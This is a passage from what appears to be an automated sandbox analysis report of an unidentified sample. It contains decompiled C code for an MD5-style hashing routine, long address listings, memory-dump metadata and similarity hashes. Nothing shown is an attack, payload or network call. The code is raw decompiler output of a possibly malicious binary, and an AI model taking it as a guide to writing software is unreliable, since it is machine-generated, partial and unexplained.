				_t588 = (_t583 & _t436 | _t526 & _t637) +  *(__eax + 0x3c) +  *(_t785 + 0x10) + 0x49b40821 + _t637;
				_t70 = _t436 - 0x9e1da9e; // -165796410
				asm("rol ecx, 0x5");
				_t438 = (_t381 & _t637 | _t526 & _t588) +  *((intOrPtr*)(__eax + 4)) + _t70 + _t588;
				asm("rol edx, 0x9");
				_t528 = ( *(_t785 + 0x1c) & _t588 | _t637 & _t438) +  *((intOrPtr*)(__eax + 0x18)) + _t526 - 0x3fbf4cc0 + _t438;
				asm("rol esi, 0xe");
				_t639 = ( !_t588 & _t438 | _t528 & _t588) +  *((intOrPtr*)(__eax + 0x2c)) + _t637 + 0x265e5a51 + _t528;
				_t79 = _t588 - 0x16493856; // -539693712
				asm("ror edi, 0xc");
				_t590 = ( !_t438 & _t528 | _t639 & _t438) +  *__eax + _t79 + _t639;
				_t401 =  *((intOrPtr*)(__eax + 0x14));
				asm("rol ecx, 0x5");
				 *(_t785 + 0x10) = _t438 + ( !_t528 & _t639 | _t528 & _t590) + _t401 - 0x29d0efa3 + _t590;
				 *((intOrPtr*)(_t785 + 0x28)) = _t401;
				_t446 =  *(_t785 + 0x10);
				asm("rol edx, 0x9");
				_t530 = ( !_t639 & _t590 | _t639 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x28)) + _t528 + 0x2441453 + _t446;
				asm("rol esi, 0xe");
				_t641 = _t639 + ( !_t590 & _t446 | _t530 & _t590) +  *(__eax + 0x3c) - 0x275e197f + _t530;
				asm("ror edi, 0xc");
				_t592 = ( !( *(_t785 + 0x10)) & _t530 | _t641 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x10)) + _t590 - 0x182c0438 + _t641;
				asm("rol ecx, 0x5");
				 *(_t785 + 0x10) = ( !_t530 & _t641 | _t530 & _t592) +  *((intOrPtr*)(__eax + 0x24)) +  *(_t785 + 0x10) + 0x21e1cde6 + _t592;
				_t466 =  *(_t785 + 0x10);
				asm("rol edx, 0x9");
				_t532 = ( !_t641 & _t592 | _t641 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x38)) + _t530 - 0x3cc8f82a + _t466;
				asm("rol esi, 0xe");
				_t643 = _t641 + ( !_t592 & _t466 | _t532 & _t592) +  *((intOrPtr*)(__eax + 0xc)) - 0xb2af279 + _t532;
				asm("ror edi, 0xc");
				_t594 = ( !( *(_t785 + 0x10)) & _t532 | _t643 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x20)) + _t592 + 0x455a14ed + _t643;
				asm("rol ecx, 0x5");
				 *(_t785 + 0x10) = ( !_t532 & _t643 | _t532 & _t594) +  *((intOrPtr*)(__eax + 0x34)) +  *(_t785 + 0x10) - 0x561c16fb + _t594;
				_t483 =  *(__eax + 8);
				 *(_t785 + 0x1c) = _t483;
				_t484 =  *(_t785 + 0x10);
				asm("rol edx, 0x9");
				_t534 = _t532 + ( !_t643 & _t594 | _t643 &  *(_t785 + 0x10)) + _t483 - 0x3105c08 + _t484;
				asm("rol esi, 0xe");
				_t645 = _t643 + ( !_t594 & _t484 | _t534 & _t594) +  *((intOrPtr*)(__eax + 0x1c)) + 0x676f02d9 + _t534;
				asm("ror edi, 0xc");
				_t596 = ( !( *(_t785 + 0x10)) & _t534 | _t645 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x30)) + _t594 - 0x72d5b376 + _t645;
				asm("rol ecx, 0x4");
				_t497 = (_t534 ^ _t645 ^ _t596) + _t401 +  *(_t785 + 0x10) - 0x5c6be + _t596;
				_t407 =  *((intOrPtr*)(__eax + 0x2c));
				asm("rol edx, 0xb");
				_t536 = (_t645 ^ _t596 ^ _t497) +  *((intOrPtr*)(__eax + 0x20)) + _t534 - 0x788e097f + _t497;
				 *((intOrPtr*)(_t785 + 0x44)) = _t407;
				_t763 =  *((intOrPtr*)(__eax + 0x38));
				asm("rol esi, 0x10");
				_t647 = _t645 + (_t536 ^ _t596 ^ _t497) + _t407 + 0x6d9d6122 + _t536;
				_t409 = _t536 ^ _t647;
				 *(_t785 + 0x10) = _t409;
				asm("ror edi, 0x9");
				_t598 = (_t409 ^ _t497) + _t763 + _t596 - 0x21ac7f4 + _t647;
				 *((intOrPtr*)(_t785 + 0x24)) = _t763;
				_t764 =  *((intOrPtr*)(__eax + 4));
				_t415 =  *((intOrPtr*)(__eax + 0x10));
				 *((intOrPtr*)(_t785 + 0x34)) = _t764;
				asm("rol ecx, 0x4");
				_t499 = ( *(_t785 + 0x10) ^ _t598) + _t764 + _t497 - 0x5b4115bc + _t598;
				 *((intOrPtr*)(_t785 + 0x40)) = _t415;
				asm("rol ebx, 0xb");
				_t417 = _t536 + (_t647 ^ _t598 ^ _t499) + _t415 + 0x4bdecfa9 + _t499;
				asm("rol esi, 0x10");
				_t649 = (_t417 ^ _t598 ^ _t499) +  *((intOrPtr*)(__eax + 0x1c)) + _t647 - 0x944b4a0 + _t417;
				_t542 = _t417 ^ _t649;
				 *(_t785 + 0x10) = _t542;
				_t543 =  *((intOrPtr*)(__eax + 0x28));
				 *((intOrPtr*)(_t785 + 0x30)) = _t543;
				asm("ror edx, 0x9");
				_t545 = _t598 + (_t542 ^ _t499) + _t543 - 0x41404390 + _t649;
				_t602 =  *__eax;
				asm("rol ecx, 0x4");
				_t501 = ( *(_t785 + 0x10) ^ _t545) +  *((intOrPtr*)(__eax + 0x34)) + _t499 + 0x289b7ec6 + _t545;
				asm("rol ebx, 0xb");
				_t419 = _t417 + (_t649 ^ _t545 ^ _t501) + _t602 - 0x155ed806 + _t501;
				 *((intOrPtr*)(_t785 + 0x20)) = _t602;
				_t603 =  *((intOrPtr*)(__eax + 0xc));
				 *((intOrPtr*)(_t785 + 0x2c)) = _t603;
				asm("rol edi, 0x10");
				_t605 = _t649 + (_t419 ^ _t545 ^ _t501) + _t603 - 0x2b10cf7b + _t419;
				_t651 = _t419 ^ _t605;
				 *(_t785 + 0x10) = _t651;
				_t652 =  *((intOrPtr*)(__eax + 0x18));
				 *((intOrPtr*)(_t785 + 0x3c)) = _t652;
				_t783 =  *((intOrPtr*)(__eax + 0x24));
				asm("ror edx, 0x9");
				_t547 = _t545 + (_t651 ^ _t501) + _t652 + 0x4881d05 + _t605;
				asm("rol ecx, 0x4");
				_t503 = ( *(_t785 + 0x10) ^ _t547) + _t783 + _t501 - 0x262b2fc7 + _t547;
				 *((intOrPtr*)(_t785 + 0x48)) = _t783;
				_t784 =  *((intOrPtr*)(__eax + 0x30));
				_t252 =  *(__eax + 0x3c);
				asm("rol esi, 0xb");
				_t661 = (_t605 ^ _t547 ^ _t503) + _t784 + _t419 - 0x1924661b + _t503;
				_t424 =  *(_t785 + 0x1c);
				 *(_t785 + 0x10) = _t252;
				asm("rol edi, 0x10");
				_t607 = (_t661 ^ _t547 ^ _t503) + _t252 + _t605 + 0x1fa27cf8 + _t661;
				asm("ror edx, 0x9");
				_t549 = (_t661 ^ _t607 ^ _t503) + _t424 + _t547 - 0x3b53a99b + _t607;
				asm("rol ecx, 0x6");
				_t505 = (( !_t661 | _t549) ^ _t607) +  *((intOrPtr*)(_t785 + 0x20)) + _t503 - 0xbd6ddbc + _t549;
				asm("rol esi, 0xa");
				_t663 = (( !_t607 | _t505) ^ _t549) +  *((intOrPtr*)(_t785 + 0x14)) + _t661 + 0x432aff97 + _t505;
				asm("rol edi, 0xf");
				_t609 = (( !_t549 | _t663) ^ _t505) +  *((intOrPtr*)(_t785 + 0x24)) + _t607 - 0x546bdc59 + _t663;
				asm("ror edx, 0xb");
				_t551 = (( !_t505 | _t609) ^ _t663) +  *((intOrPtr*)(_t785 + 0x28)) + _t549 - 0x36c5fc7 + _t609;
				asm("rol ecx, 0x6");
				_t507 = (( !_t663 | _t551) ^ _t609) + _t784 + _t505 + 0x655b59c3 + _t551;
				asm("rol esi, 0xa");
				_t665 = (( !_t609 | _t507) ^ _t551) +  *((intOrPtr*)(_t785 + 0x2c)) + _t663 - 0x70f3336e + _t507;
				asm("rol edi, 0xf");
				_t611 = (( !_t551 | _t665) ^ _t507) +  *((intOrPtr*)(_t785 + 0x30)) + _t609 - 0x100b83 + _t665;
				asm("ror edx, 0xb");
				_t553 = (( !_t507 | _t611) ^ _t665) +  *((intOrPtr*)(_t785 + 0x34)) + _t551 - 0x7a7ba22f + _t611;
				asm("rol ecx, 0x6");
				_t509 = (( !_t665 | _t553) ^ _t611) +  *((intOrPtr*)(_t785 + 0x38)) + _t507 + 0x6fa87e4f + _t553;
				asm("rol eax, 0xa");
				_t308 = (( !_t611 | _t509) ^ _t553) +  *(_t785 + 0x10) + _t665 - 0x1d31920 + _t509;
				asm("rol esi, 0xf");
				_t672 = (( !_t553 | _t308) ^ _t509) +  *((intOrPtr*)(_t785 + 0x3c)) + _t611 - 0x5cfebcec + _t308;
				asm("ror edx, 0xb");
				_t555 = (( !_t509 | _t672) ^ _t308) +  *((intOrPtr*)(_t785 + 0x18)) + _t553 + 0x4e0811a1 + _t672;
				asm("rol ecx, 0x6");
				_t511 = (( !_t308 | _t555) ^ _t672) +  *((intOrPtr*)(_t785 + 0x40)) + _t509 - 0x8ac817e + _t555;
				asm("rol edi, 0xa");
				_t628 = (( !_t672 | _t511) ^ _t555) +  *((intOrPtr*)(_t785 + 0x44)) + _t308 - 0x42c50dcb + _t511;
				asm("rol esi, 0xf");
				_t674 = (( !_t555 | _t628) ^ _t511) + _t424 + _t672 + 0x2ad7d2bb + _t628;
				_t319 =  *((intOrPtr*)(_t785 + 0x50));
				asm("ror edx, 0xb");
				 *((intOrPtr*)(_t319 + 4)) =  *((intOrPtr*)(_t319 + 4)) + (( !_t511 | _t674) ^ _t628) +  *((intOrPtr*)(_t785 + 0x48)) + _t555 - 0x14792c6f + _t674;
				 *((intOrPtr*)(_t319 + 8)) =  *((intOrPtr*)(_t319 + 8)) + _t674;
				 *_t319 =  *_t319 + _t511;
				 *((intOrPtr*)(_t319 + 0xc)) =  *((intOrPtr*)(_t319 + 0xc)) + _t628;
				return _t319;
			}































































































                                                                                                                                                                                          0x00cffac4
                                                                                                                                                                                          0x00cffac8
                                                                                                                                                                                          0x00cffacd
                                                                                                                                                                                          0x00cffad1
                                                                                                                                                                                          0x00cffaed
                                                                                                                                                                                          0x00cffaf0
                                                                                                                                                                                          0x00cffaff
                                                                                                                                                                                          0x00cffb06
                                                                                                                                                                                          0x00cffb09
                                                                                                                                                                                          0x00cffb1c
                                                                                                                                                                                          0x00cffb23
                                                                                                                                                                                          0x00cffb26
                                                                                                                                                                                          0x00cffb41
                                                                                                                                                                                          0x00cffb44
                                                                                                                                                                                          0x00cffb46
                                                                                                                                                                                          0x00cffb5d
                                                                                                                                                                                          0x00cffb61
                                                                                                                                                                                          0x00cffb64
                                                                                                                                                                                          0x00cffb7c
                                                                                                                                                                                          0x00cffb7f
                                                                                                                                                                                          0x00cffb97
                                                                                                                                                                                          0x00cffb9a
                                                                                                                                                                                          0x00cffb9f
                                                                                                                                                                                          0x00cffbbc
                                                                                                                                                                                          0x00cffbbf
                                                                                                                                                                                          0x00cffbc2
                                                                                                                                                                                          0x00cffbc4
                                                                                                                                                                                          0x00cffbd4
                                                                                                                                                                                          0x00cffbdf
                                                                                                                                                                                          0x00cffbe3
                                                                                                                                                                                          0x00cffbe6
                                                                                                                                                                                          0x00cffbfe
                                                                                                                                                                                          0x00cffc01
                                                                                                                                                                                          0x00cffc1b
                                                                                                                                                                                          0x00cffc1e
                                                                                                                                                                                          0x00cffc39
                                                                                                                                                                                          0x00cffc3c
                                                                                                                                                                                          0x00cffc3e
                                                                                                                                                                                          0x00cffc58
                                                                                                                                                                                          0x00cffc5c
                                                                                                                                                                                          0x00cffc60
                                                                                                                                                                                          0x00cffc63
                                                                                                                                                                                          0x00cffc7c
                                                                                                                                                                                          0x00cffc7f
                                                                                                                                                                                          0x00cffc83
                                                                                                                                                                                          0x00cffc99
                                                                                                                                                                                          0x00cffc9c
                                                                                                                                                                                          0x00cffca2
                                                                                                                                                                                          0x00cffca4
                                                                                                                                                                                          0x00cffcbe
                                                                                                                                                                                          0x00cffcc1
                                                                                                                                                                                          0x00cffcce
                                                                                                                                                                                          0x00cffcdb
                                                                                                                                                                                          0x00cffcde
                                                                                                                                                                                          0x00cffcee
                                                                                                                                                                                          0x00cffcf1
                                                                                                                                                                                          0x00cffd0b
                                                                                                                                                                                          0x00cffd0e
                                                                                                                                                                                          0x00cffd1e
                                                                                                                                                                                          0x00cffd25
                                                                                                                                                                                          0x00cffd28
                                                                                                                                                                                          0x00cffd34
                                                                                                                                                                                          0x00cffd40
                                                                                                                                                                                          0x00cffd45
                                                                                                                                                                                          0x00cffd55
                                                                                                                                                                                          0x00cffd65
                                                                                                                                                                                          0x00cffd69
                                                                                                                                                                                          0x00cffd6c
                                                                                                                                                                                          0x00cffd8c
                                                                                                                                                                                          0x00cffd8f
                                                                                                                                                                                          0x00cffda5
                                                                                                                                                                                          0x00cffda8
                                                                                                                                                                                          0x00cffdc2
                                                                                                                                                                                          0x00cffdc7
                                                                                                                                                                                          0x00cffde5
                                                                                                                                                                                          0x00cffded
                                                                                                                                                                                          0x00cffdf0
                                                                                                                                                                                          0x00cffe0a
                                                                                                                                                                                          0x00cffe0d
                                                                                                                                                                                          0x00cffe23
                                                                                                                                                                                          0x00cffe26
                                                                                                                                                                                          0x00cffe40
                                                                                                                                                                                          0x00cffe47
                                                                                                                                                                                          0x00cffe57
                                                                                                                                                                                          0x00cffe63
                                                                                                                                                                                          0x00cffe67
                                                                                                                                                                                          0x00cffe6b
                                                                                                                                                                                          0x00cffe6e
                                                                                                                                                                                          0x00cffe8a
                                                                                                                                                                                          0x00cffe8d
                                                                                                                                                                                          0x00cffea5
                                                                                                                                                                                          0x00cffea8
                                                                                                                                                                                          0x00cffebd
                                                                                                                                                                                          0x00cffec0
                                                                                                                                                                                          0x00cffed2
                                                                                                                                                                                          0x00cffed5
                                                                                                                                                                                          0x00cffed8
                                                                                                                                                                                          0x00cffee2
                                                                                                                                                                                          0x00cffeed
                                                                                                                                                                                          0x00cffef0
                                                                                                                                                                                          0x00cffef3
                                                                                                                                                                                          0x00cffef7
                                                                                                                                                                                          0x00cffef9
                                                                                                                                                                                          0x00cfff0c
                                                                                                                                                                                          0x00cfff0f
                                                                                                                                                                                          0x00cfff13
                                                                                                                                                                                          0x00cfff17
                                                                                                                                                                                          0x00cfff23
                                                                                                                                                                                          0x00cfff26
                                                                                                                                                                                          0x00cfff2a
                                                                                                                                                                                          0x00cfff2d
                                                                                                                                                                                          0x00cfff37
                                                                                                                                                                                          0x00cfff42
                                                                                                                                                                                          0x00cfff45
                                                                                                                                                                                          0x00cfff57
                                                                                                                                                                                          0x00cfff5a
                                                                                                                                                                                          0x00cfff5e
                                                                                                                                                                                          0x00cfff60
                                                                                                                                                                                          0x00cfff66
                                                                                                                                                                                          0x00cfff6d
                                                                                                                                                                                          0x00cfff7c
                                                                                                                                                                                          0x00cfff7f
                                                                                                                                                                                          0x00cfff91
                                                                                                                                                                                          0x00cfff93
                                                                                                                                                                                          0x00cfff96
                                                                                                                                                                                          0x00cfffa3
                                                                                                                                                                                          0x00cfffa6
                                                                                                                                                                                          0x00cfffae
                                                                                                                                                                                          0x00cfffb2
                                                                                                                                                                                          0x00cfffb7
                                                                                                                                                                                          0x00cfffc2
                                                                                                                                                                                          0x00cfffc5
                                                                                                                                                                                          0x00cfffc9
                                                                                                                                                                                          0x00cfffcd
                                                                                                                                                                                          0x00cfffd1
                                                                                                                                                                                          0x00cfffd8
                                                                                                                                                                                          0x00cfffe7
                                                                                                                                                                                          0x00cfffea
                                                                                                                                                                                          0x00cfffed
                                                                                                                                                                                          0x00cffffa
                                                                                                                                                                                          0x00cffffd
                                                                                                                                                                                          0x00d00005
                                                                                                                                                                                          0x00d00009
                                                                                                                                                                                          0x00d0000c
                                                                                                                                                                                          0x00d00018
                                                                                                                                                                                          0x00d0001b
                                                                                                                                                                                          0x00d0002c
                                                                                                                                                                                          0x00d00030
                                                                                                                                                                                          0x00d00034
                                                                                                                                                                                          0x00d00037
                                                                                                                                                                                          0x00d00048
                                                                                                                                                                                          0x00d0004b
                                                                                                                                                                                          0x00d00060
                                                                                                                                                                                          0x00d00063
                                                                                                                                                                                          0x00d00078
                                                                                                                                                                                          0x00d0007b
                                                                                                                                                                                          0x00d00090
                                                                                                                                                                                          0x00d00093
                                                                                                                                                                                          0x00d000a8
                                                                                                                                                                                          0x00d000ab
                                                                                                                                                                                          0x00d000be
                                                                                                                                                                                          0x00d000c1
                                                                                                                                                                                          0x00d000d6
                                                                                                                                                                                          0x00d000d9
                                                                                                                                                                                          0x00d000ee
                                                                                                                                                                                          0x00d000f1
                                                                                                                                                                                          0x00d00106
                                                                                                                                                                                          0x00d00109
                                                                                                                                                                                          0x00d0011e
                                                                                                                                                                                          0x00d00125
                                                                                                                                                                                          0x00d00136
                                                                                                                                                                                          0x00d00139
                                                                                                                                                                                          0x00d0014e
                                                                                                                                                                                          0x00d00151
                                                                                                                                                                                          0x00d0016a
                                                                                                                                                                                          0x00d0016d
                                                                                                                                                                                          0x00d0017e
                                                                                                                                                                                          0x00d00181
                                                                                                                                                                                          0x00d00196
                                                                                                                                                                                          0x00d00199
                                                                                                                                                                                          0x00d001ae
                                                                                                                                                                                          0x00d001b1
                                                                                                                                                                                          0x00d001c4
                                                                                                                                                                                          0x00d001cf
                                                                                                                                                                                          0x00d001d6
                                                                                                                                                                                          0x00d001de
                                                                                                                                                                                          0x00d001e9
                                                                                                                                                                                          0x00d001eb
                                                                                                                                                                                          0x00d001f2

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                                                                                                                                                                          • Instruction ID: 2f5bd20dfdf8811118756d311ad70a8170244ae597dc099000ab618d47d0b37e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 390dfdf4b9ea32333300fc9057e662f8209510aa40f045774bdb22c753d4746b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9532F5B7A583194FC70CCE85DC805A5B3E2FBD8304B0E597D9959D7316EBB4EA098AC0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C830C0 Relevance: .6, Instructions: 583COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E00C830C0(intOrPtr* __edi) {
				void* _t207;
				signed int _t212;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t224;
				signed int _t226;
				signed int _t228;
				signed int _t230;
				signed int _t232;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t242;
				signed int _t253;
				signed int _t254;
				signed int _t311;
				signed int _t316;
				signed int _t407;
				signed int _t413;
				signed int _t425;
				signed int _t519;
				signed int _t521;
				signed int _t523;
				signed int _t525;
				signed int _t527;
				signed int _t529;
				signed int _t531;
				signed int _t533;
				signed int _t542;
				signed int _t544;
				signed int _t546;
				signed int _t548;
				signed int _t550;
				signed int _t552;
				signed int _t554;
				signed int _t565;
				signed int _t567;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t579;
				signed int _t581;
				signed int _t583;
				signed int _t585;
				signed int _t593;
				signed int _t595;
				signed int _t597;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t605;
				signed int _t607;
				signed int _t609;
				signed int _t611;
				signed int _t613;
				signed int _t615;
				signed int _t617;
				signed int _t619;
				signed int _t625;
				signed int _t627;
				signed int _t633;
				signed int _t635;
				signed int _t637;
				signed int _t639;
				signed int _t641;
				signed int _t642;
				signed int _t704;
				void* _t713;

				_t254 =  *(__edi + 8);
				_t642 =  *(__edi + 0xc);
				_t603 =  *(__edi + 4);
				E00C837A0(_t207, _t713 + 0x14);
				asm("rol eax, 0x7");
				_t212 = ( !_t603 & _t642 | _t254 & _t603) +  *__edi +  *((intOrPtr*)(_t713 + 0x14)) - 0x28955b88 + _t603;
				asm("rol ecx, 0xc");
				_t519 = ( !_t212 & _t254 | _t603 & _t212) +  *((intOrPtr*)(_t713 + 0x18)) + _t642 - 0x173848aa + _t212;
				asm("ror edx, 0xf");
				_t565 = ( !_t519 & _t603 | _t519 & _t212) +  *((intOrPtr*)(_t713 + 0x1c)) + _t254 + 0x242070db + _t519;
				asm("ror esi, 0xa");
				_t605 = ( !_t565 & _t212 | _t519 & _t565) +  *((intOrPtr*)(_t713 + 0x20)) + _t603 - 0x3e423112 + _t565;
				asm("rol eax, 0x7");
				_t214 = ( !_t605 & _t519 | _t565 & _t605) +  *((intOrPtr*)(_t713 + 0x24)) + _t212 - 0xa83f051 + _t605;
				asm("rol ecx, 0xc");
				_t521 = ( !_t214 & _t565 | _t605 & _t214) +  *((intOrPtr*)(_t713 + 0x28)) + _t519 + 0x4787c62a + _t214;
				asm("ror edx, 0xf");
				_t567 = ( !_t521 & _t605 | _t521 & _t214) +  *((intOrPtr*)(_t713 + 0x2c)) + _t565 - 0x57cfb9ed + _t521;
				asm("ror esi, 0xa");
				_t607 = ( !_t567 & _t214 | _t521 & _t567) +  *((intOrPtr*)(_t713 + 0x30)) + _t605 - 0x2b96aff + _t567;
				asm("rol eax, 0x7");
				_t216 = ( !_t607 & _t521 | _t567 & _t607) +  *((intOrPtr*)(_t713 + 0x34)) + _t214 + 0x698098d8 + _t607;
				asm("rol ecx, 0xc");
				_t523 = ( !_t216 & _t567 | _t607 & _t216) +  *((intOrPtr*)(_t713 + 0x38)) + _t521 - 0x74bb0851 + _t216;
				asm("ror edx, 0xf");
				_t569 = ( !_t523 & _t607 | _t523 & _t216) +  *((intOrPtr*)(_t713 + 0x3c)) + _t567 - 0xa44f + _t523;
				asm("ror esi, 0xa");
				_t609 = ( !_t569 & _t216 | _t523 & _t569) +  *((intOrPtr*)(_t713 + 0x40)) + _t607 - 0x76a32842 + _t569;
				asm("rol eax, 0x7");
				_t218 = ( !_t609 & _t523 | _t569 & _t609) +  *((intOrPtr*)(_t713 + 0x44)) + _t216 + 0x6b901122 + _t609;
				asm("rol ecx, 0xc");
				_t525 = ( !_t218 & _t569 | _t609 & _t218) +  *((intOrPtr*)(_t713 + 0x48)) + _t523 - 0x2678e6d + _t218;
				_t311 =  !_t525;
				 *(_t713 + 0xc) = _t311;
				asm("ror edx, 0xf");
				_t571 = (_t311 & _t609 | _t525 & _t218) +  *((intOrPtr*)(_t713 + 0x4c)) + _t569 - 0x5986bc72 + _t525;
				_t316 =  !_t571;
				 *(_t713 + 0x10) = _t316;
				asm("ror esi, 0xa");
				_t611 = (_t316 & _t218 | _t525 & _t571) +  *((intOrPtr*)(_t713 + 0x50)) + _t609 + 0x49b40821 + _t571;
				asm("rol eax, 0x5");
				_t220 = ( *(_t713 + 0xc) & _t571 | _t525 & _t611) +  *((intOrPtr*)(_t713 + 0x18)) + _t218 - 0x9e1da9e + _t611;
				asm("rol ecx, 0x9");
				_t527 = ( *(_t713 + 0x10) & _t611 | _t571 & _t220) +  *((intOrPtr*)(_t713 + 0x2c)) + _t525 - 0x3fbf4cc0 + _t220;
				asm("rol edx, 0xe");
				_t573 = ( !_t611 & _t220 | _t527 & _t611) +  *((intOrPtr*)(_t713 + 0x40)) + _t571 + 0x265e5a51 + _t527;
				asm("ror esi, 0xc");
				_t613 = ( !_t220 & _t527 | _t573 & _t220) +  *((intOrPtr*)(_t713 + 0x14)) + _t611 - 0x16493856 + _t573;
				asm("rol eax, 0x5");
				_t222 = ( !_t527 & _t573 | _t527 & _t613) +  *((intOrPtr*)(_t713 + 0x28)) + _t220 - 0x29d0efa3 + _t613;
				asm("rol ecx, 0x9");
				_t529 = ( !_t573 & _t613 | _t573 & _t222) +  *((intOrPtr*)(_t713 + 0x3c)) + _t527 + 0x2441453 + _t222;
				asm("rol edx, 0xe");
				_t575 = ( !_t613 & _t222 | _t529 & _t613) +  *((intOrPtr*)(_t713 + 0x50)) + _t573 - 0x275e197f + _t529;
				asm("ror esi, 0xc");
				_t615 = ( !_t222 & _t529 | _t575 & _t222) +  *((intOrPtr*)(_t713 + 0x24)) + _t613 - 0x182c0438 + _t575;
				asm("rol eax, 0x5");
				_t224 = ( !_t529 & _t575 | _t529 & _t615) +  *((intOrPtr*)(_t713 + 0x38)) + _t222 + 0x21e1cde6 + _t615;
				asm("rol ecx, 0x9");
				_t531 = ( !_t575 & _t615 | _t575 & _t224) +  *((intOrPtr*)(_t713 + 0x4c)) + _t529 - 0x3cc8f82a + _t224;
				asm("rol edx, 0xe");
				_t577 = ( !_t615 & _t224 | _t531 & _t615) +  *((intOrPtr*)(_t713 + 0x20)) + _t575 - 0xb2af279 + _t531;
				asm("ror esi, 0xc");
				_t617 = ( !_t224 & _t531 | _t577 & _t224) +  *((intOrPtr*)(_t713 + 0x34)) + _t615 + 0x455a14ed + _t577;
				asm("rol eax, 0x5");
				_t226 = ( !_t531 & _t577 | _t531 & _t617) +  *((intOrPtr*)(_t713 + 0x48)) + _t224 - 0x561c16fb + _t617;
				asm("rol ecx, 0x9");
				_t533 = ( !_t577 & _t617 | _t577 & _t226) +  *((intOrPtr*)(_t713 + 0x1c)) + _t531 - 0x3105c08 + _t226;
				asm("rol edx, 0xe");
				_t579 = ( !_t617 & _t226 | _t533 & _t617) +  *((intOrPtr*)(_t713 + 0x30)) + _t577 + 0x676f02d9 + _t533;
				asm("ror esi, 0xc");
				_t619 = ( !_t226 & _t533 | _t579 & _t226) +  *((intOrPtr*)(_t713 + 0x44)) + _t617 - 0x72d5b376 + _t579;
				asm("rol eax, 0x4");
				_t228 = (_t533 ^ _t579 ^ _t619) +  *((intOrPtr*)(_t713 + 0x28)) + _t226 - 0x5c6be + _t619;
				asm("rol ebx, 0xb");
				_t407 = (_t579 ^ _t619 ^ _t228) +  *((intOrPtr*)(_t713 + 0x34)) + _t533 - 0x788e097f + _t228;
				asm("rol edx, 0x10");
				_t581 = (_t407 ^ _t619 ^ _t228) +  *((intOrPtr*)(_t713 + 0x40)) + _t579 + 0x6d9d6122 + _t407;
				_t704 = _t407 ^ _t581;
				asm("ror ecx, 0x9");
				_t542 = (_t704 ^ _t228) +  *((intOrPtr*)(_t713 + 0x4c)) + _t619 - 0x21ac7f4 + _t581;
				asm("rol eax, 0x4");
				_t230 = _t228 + (_t704 ^ _t542) +  *((intOrPtr*)(_t713 + 0x18)) - 0x5b4115bc + _t542;
				asm("rol esi, 0xb");
				_t625 = (_t581 ^ _t542 ^ _t230) +  *((intOrPtr*)(_t713 + 0x24)) + _t407 + 0x4bdecfa9 + _t230;
				asm("rol edx, 0x10");
				_t583 = (_t625 ^ _t542 ^ _t230) +  *((intOrPtr*)(_t713 + 0x30)) + _t581 - 0x944b4a0 + _t625;
				_t413 = _t625 ^ _t583;
				asm("ror ecx, 0x9");
				_t544 = _t542 + (_t413 ^ _t230) +  *((intOrPtr*)(_t713 + 0x3c)) - 0x41404390 + _t583;
				asm("rol eax, 0x4");
				_t232 = (_t413 ^ _t544) +  *((intOrPtr*)(_t713 + 0x48)) + _t230 + 0x289b7ec6 + _t544;
				asm("rol esi, 0xb");
				_t627 = (_t583 ^ _t544 ^ _t232) +  *((intOrPtr*)(_t713 + 0x14)) + _t625 - 0x155ed806 + _t232;
				asm("rol ebx, 0x10");
				_t425 = (_t627 ^ _t544 ^ _t232) +  *((intOrPtr*)(_t713 + 0x20)) + _t583 - 0x2b10cf7b + _t627;
				_t585 = _t627 ^ _t425;
				asm("ror ecx, 0x9");
				_t546 = _t544 + (_t585 ^ _t232) +  *((intOrPtr*)(_t713 + 0x2c)) + 0x4881d05 + _t425;
				asm("rol eax, 0x4");
				_t234 = (_t585 ^ _t546) +  *((intOrPtr*)(_t713 + 0x38)) + _t232 - 0x262b2fc7 + _t546;
				asm("rol edx, 0xb");
				_t593 = (_t425 ^ _t546 ^ _t234) +  *((intOrPtr*)(_t713 + 0x44)) + _t627 - 0x1924661b + _t234;
				asm("rol esi, 0x10");
